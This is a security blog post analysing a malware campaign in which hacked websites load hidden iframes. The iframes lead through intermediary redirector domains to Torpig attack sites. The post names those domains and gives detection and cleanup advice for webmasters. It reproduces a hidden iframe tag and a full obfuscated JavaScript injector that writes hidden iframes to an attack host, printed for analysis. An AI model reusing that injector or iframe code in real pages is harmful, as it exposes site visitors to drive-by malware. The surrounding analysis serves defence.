Intermediaries to Torpig Attack Sites

In the previous post, I reviewed a website hack that injected malicious scripts that used Twitter API to generated domain names for attack sites. Domain names of the attack sites changed two times a day.

However since the malicious script works on the client side, the algorithm of the domain name generator can be easily extracted and used to predict upcoming malicious domains. To demonstrate this, I created my online “Torpig Domain Generator” that displays the currently used attack site and two domains of upcoming attack sites. It’s been working for mre than a week now and so far it is very accurate (For unknown reason hackers didn’t activate malicious domains this past Saturday, but infected sites still redirected to the same domains predicted by my generator.)

The fact that the algorithm is open and domain names of the upcoming malicious sites are known even before hackers register them means that any one who wants to stop the attack can pre-register those domains (so far it looks like no one have spare $20/day for this). The same algorithm can be used to proactively blacklist malicious domain names.

I’m sure hackers are aware of these downsides of open algorithms. Now they are trying to take advantage of the frequently changing pseudorandom domain names hiding the algorithm of the domain name generator behind intermediary servers-redirectors.

Here’s the story.

I was doing my usual rounds checking reported infected sites. On one of them, Unmask Parasites reported a hidden iframe from pantali .com. The domain name was not familiar to me, so I decided to manually check the site.

It contained the following HTML code:

<i frame src="http:// pantali .com/counter3.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

I decided to check the content of that iframe. When I loaded the URL, I was redirected to “gefjcrpgtwe .com“. I knew that this was the active torpig attack site at that moment. A few hours later pantali .com redirected to another torpig domain (gabtibbgtwe .com). It was clear that the pantali .com site internally used the same “twitter trends-based” algorithm to generate domains names of malicious sites it redirected web surfers to.

A few more hours of the investigation and I identified a few more similar sites that redirected to torpig attack sites: encybest .com, prerre .com, framtr .com, frostep .com, hornalfa .com .

In most cases the iframes were not injected explicitly. Instead, hacked web pages contained obfuscated scripts that looked similar to this one:

function uxJCYwhO(ckywdhKuEi){ var uqZTie=new Function("qJSBfdqJK", "return 916641;");var uqZTie=new Function("qJSBfdqJK", "return 916641;");var YTGxCsWCK = document.getElementById('rNzKHVUF'); }
function TOeY(oUIMPP){var nvZzOau=4,ItsB=8;var zEzgEz='68,0-90,4-89,0-95,0-86,4-92,4-88,4-54,0-97,4-90,4-88,0-96,0-90,0-68,4-62,4-54,0-90,0-88,4-90,4-89,4-90,0-96,0-68,4-62,4-54,0-87,0-93,4-95,0-88,0-88,4-',Esk=zEzgEz.split('-');cIywjzDV='';
function EtMXLfrdWG(c)
{
return String.fromCharCode(c);
}
for(gKTFgC=Esk.length-1;gKTFgC>=-0x27-0x26+0x1f+0x2e;gKTFgC-=0x21-0x10-0x2c+0x19-0x2+0x5)
{ lKdlcO=Esk[gKTFgC].split(',');MzmfkFxQEm = parseInt(lKdlcO[0]*ItsB)+parseInt(lKdlcO[1]);MzmfkFxQEm = parseInt(MzmfkFxQEm)/nvZzOau;cIywjzDV = EtMXLfrdWG(MzmfkFxQEm-(-0x24+0x28-0x18-0x20+0x4+0x7c))+cIywjzDV;}return cIywjzDV;}function ptQfekDx(FuXVWqOGz){ fff=op.split("1030"); }
function GQUbdSANq(MiSqsomuR){var xzldYWHzx=5,uhPRjaJHk=7;var vFqkoFY='135,5-97,6-88,4-77,1-127,1-135,5-123,4-132,1-126,3-124,2-133,4-135,5-125,5-126,3-135,5-97,6-88,4-77,1-136,3-135,5-125,0-97,6-82,1-128,4-137,1-137,1-134,2-95,5-87,6-87,6-',jbFRYrOVC=vFqkoFY.split('-');UcX='';
function xmjG(c)
{
return String.fromCharCode(c);
}
for(uxDttjJ=jbFRYrOVC.length-1;uxDttjJ>=-0x1e+0x2a+0x2f-0x3b;uxDttjJ-=0x29+0x1a+0x27-0x15-0x17-0x12-0x2b)
{ erEpzWMFH=jbFRYrOVC[uxDttjJ].split(',');QizIYxgPt = parseInt(erEpzWMFH[0]*uhPRjaJHk)+parseInt(erEpzWMFH[1]);QizIYxgPt = parseInt(QizIYxgPt)/xzldYWHzx;UcX = xmjG(QizIYxgPt-(0x2f-0x10-0xd+0x10+0x1c+0xe))+UcX;}return UcX;}function GYtOR(dnsyNDzGiF){var lIq=4,KJpd=10;var qkSRhYaQ='71,2-76,0-74,8-76,4-76,8-70,8-75,2-48,8-70,0-74,8-74,0-49,2-72,4-74,4-48,8-75,2-72,0-75,2-46,0-55,2-54,4-49,2-72,4-71,2-76,0-69,2-74,0-70,8-55,2-',PihGgqBNpm=qkSRhYaQ.split('-');RCUZUzm='';
function omhdyesSL(c)
{
return String.fromCharCode(c);
}
for(ANWHHxWqJ=PihGgqBNpm.length-1;ANWHHxWqJ>=0x17-0x30+0x6-0x32-0x19-0x17-0x13+0xa+0x7e;ANWHHxWqJ-=-0x1d-0x25-0x14-0x16+0x16+0x57)
{ iWQt=PihGgqBNpm[ANWHHxWqJ].split(',');GPmIsuI = parseInt(iWQt[0]*KJpd)+parseInt(iWQt[1]);GPmIsuI = parseInt(GPmIsuI)/lIq;RCUZUzm = omhdyesSL(GPmIsuI-(-0x13-0x1e+0x7d))+RCUZUzm;}return RCUZUzm;}function zPni(kTvWO){ var JldcrXozJz = do cument.getElementById('tWKUFx'); fff=op.split("737");var JldcrXozJz = document.getElementById('tWKUFx'); }
function UFZIte(BKuK){ var wPK=new Function("uHhpbYiCKa", "return 887153;"); fff.op.replace("176"); }
doc ument['6411wr6331i6680 t5394e24906332'.replace(/[0-9]/g,'')](TOeY('fadS'),GQUbdSANq('iEWPTELC'),GYtOR('tnUgIVc'));function dVkU(kWKhf){ fff.op.replace("526");alert('KqJ');window.eval(); fff.op.replace("526"); }
function JsyJ(haS){ fff.op.replace("1029"); }
function TAPv(WYe){ window.eval();window.eval(); }

The script injects hidden iframes on the fly. The above code generated the following iframe

<i frame width=1 height=1 border=0 frameborder=0 src='hxxp://frostep .com/in.php'></iframe>

but there are many modifications of this script and they all create different iframes. The only common thing is the sites where those hidden iframes redirect to — to currently active torpig attack sites.

This intermediary layer can help hide the algorithm of the domain generator. And if hackers ever decide to change the algorithm and at the same time stop injecting malicious scripts that contain the algorithm into hacked legitimate web pages, we won’t be able to predict upcoming malicious domains. However, so far their current algorithm is known and my torpig domain generator still correctly displays current and upcoming attack sites.

I should mention that the intermediary sites not always redirect to Torpig domains. Sometimes they redirect to domoktov .com. I’m not sure how this site is connected with those pseudorandom domain names. It has different IP, and different URL structure. Any ideas?

To webmasters

This is not yet for sure, but i have preliminary information that this attack also uses stolen FTP credentials:

1. I have one report about suspicious entries in FTP logs (several unknown IP accessed sites using correct credentials)
2. Many of the infected sites have signs of other malware attacks that are known for using stolen FTP credentials (e.g. Gumblar and various iframe injections)

Detection

You should be looking for suspicious scripts and iframes injected into your site’s web pages (they usually infect many web pages, still some of them may remain clean).

Unmask Parasites is always good at detecting hidden iframes. The above mentioned scripts can also be detected by Unmask Parasites (here is a sample Unmask Parasites report).

You should also check external .js files.

Another sign that your site is a victim of this particular attack is Google’s Safe Browsing diagnostic pages for your website that mention any of these domains: pantali .com, encybest .com, prerre .com, framtr .com, frostep .com, hornalfa .com, domoktov .com .

Cleaning up

Here are the usual instructions for website infections that involve stolen FTP credentials

1. Start with your local computer. Scan it for all sorts of malware.
2. Change all site passwords and keep them secure (don’t store the new passwords in FTP programs)
3. Remove malicious code from files on server. The easiest way to do it is to remove everything and then restore from a clean backup copy. (You have backups, don’t you?)
4. If Google has blacklisted your site, you’ll need to request a malware review via Webmaster Tools (you can read more about dealing with Google malware warnings in my guide)

Have your say

Is this attack familiar to you? Did you or your client suffer from it? Did I miss any important information?
Your comments are welcome.

Related posts:

• Twitter API Still Attracts Hackers
• Hackers Use Twitter API To Trigger Malicious Scripts
• Revenge of Gumblar Zombies
• 10 FTP Clients Malware Steals Credentials From